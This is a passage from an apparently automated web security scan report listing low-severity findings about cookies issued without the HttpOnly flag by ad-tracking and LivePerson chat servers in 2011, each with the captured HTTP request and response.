Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.263. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.264. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=334085935? HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=;ord=334085935?
Content-Length: 568
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.265. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 553
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.266. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313? HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 05:21:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_AOL_CPA_728;RS_SELL_2011Q1_AOL_CPA_728;:$:AOLB3/RadioShack/SELL_2011Q1/CPA/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=670623313?
Content-Length: 653
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.267. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:44:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=b3&migTrackDataExt=n4;USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300;FarmD_2011Q1_TRIBALF_A_TX_300;:$:TribalFusionB3/FarmersDirect/2011Q1/A_TX/300:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 568
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=188&a
...[SNIP]...

11.268. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:44:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_TF_CT_728;RS_SELL_2011Q1_TF_CT_728;:$:TribalFusionB3/RadioShack/SELL_2011Q1/CT/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 557
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.269. http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 16:44:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=b3&migTrackDataExt=n4;USNetwork/RS_SELL_2011Q1_TF_CT_728;RS_SELL_2011Q1_TF_CT_728;:$:TribalFusionB3/RadioShack/SELL_2011Q1/CT/728:$:&migRandom=__RAND__&migTrackFmtExt=network;account/campaign;ad;page&migUnencodedDest=
Content-Length: 557
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://t.mookie1.com/t/v1/clk?migAgencyId=43&am
...[SNIP]...

11.270. http://b3.mookie1.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:49:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 15:41:54 GMT
ETag: "1fe03-1cee-bbc5480"
Accept-Ranges: bytes
Content-Length: 7406
Content-Type: text/plain
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

[binary icon data omitted]
...[SNIP]...

11.271. http://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?&site=5296924&cmd=mTagStartPage&lpCallId=388698517112-580234512686&protV=20&lpjson=1&page=http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-english&activePlugin=none&cobrowse=true&PV%21MktSegment=&PV%21unit=sales&PV%21Section=SEOLanding&PV%21CampaignCode=&PV%21pageLoadTime=4%20sec&PV%21visitorActive=1&SV%21language=english&title=Live%20Chat%20by%20LivePerson&cookie=visitor%3Dvarid%3Dbing%26ref%3Dbing%2Bcpc%2B%2Bchat%2B%252Dus%3B%20ASPSESSIONIDQSDTDCQS%3DICGJONICHIIHMLMANIPEDEIG%3B%20__utmz%3D1.1296223198.1.1.utmcsr%3Dbing%7Cutmccn%3Dchat%2520-us%7Cutmcmd%3Dcpc%3B%20__utma%3D1.925961970.1296223198.1296223198.1296223198.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1296223198 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296223154:0; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 13:59:14 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 13:59:14 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"388698517112-580234512686","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

11.272. http://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?&site=5296924&cmd=mTagKnockPage&lpCallId=468449104344-358576817670&protV=20&lpjson=1&id=4553523208&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-seo-campaign1%7ClpMTagConfig.db1%7ClpButton-seo-campaign1%7C%23chat-seo-campaign2%7ClpMTagConfig.db1%7ClpButton-seo-campaign2%7C%23voice-seo-campaign%7Cnull%7ClpButton-voice-seo-campaign%7C HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
Referer: http://solutions.liveperson.com/live-chat/C1/?utm_source=bing&utm_medium=cpc&utm_keyword=live%20chat&utm_campaign=chat%20-us
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:59:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6680227135865200365; path=/hc/5296924
Set-Cookie: HumanClickACTIVE=1296223153625; expires=Sat, 29-Jan-2011 13:59:13 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 13:59:13 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31783

lpConnLib.Process({"ResultSet": {"lpCallId":"468449104344-358576817670","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'base.liveperson.ne
...[SNIP]...

11.273. http://base.liveperson.net/hc/5296924/cmd/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://base.liveperson.net
Path:   /hc/5296924/cmd/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/5296924/cmd/url/?site=5296924&SV!click-query-name=chat-seo-campaign1&SV!click-query-room=chat-seo-campaign1&SV!click-query-state=Available&SV!click-query-channel=web&page=http%3A//base.liveperson.net/hc/5296924/%3Fcmd%3Dfile%26file%3DvisitorWantsToChat%26site%3D5296924%26SV%21chat-button-name%3Dchat-seo-campaign1%26SV%21chat-button-room%3Dchat-seo-campaign1%26referrer%3D%28button%2520dynamic-button%3Achat-seo-campaign1%28Live%2520Chat%2520by%2520LivePerson%29%29%2520http%253A//solutions.liveperson.com/live-chat/C1/%253Futm_source%253Dbing%2526utm_medium%253Dcpc%2526utm_keyword%253Dlive%252520chat%2526utm_campaign%253Dchat%252520-us&id=4553523208&waitForVisitor=redirectBack&redirectAttempts=10&redirectTimeout=500&&d=1296223648368 HTTP/1.1
Host: base.liveperson.net
Proxy-Connection: keep-alive
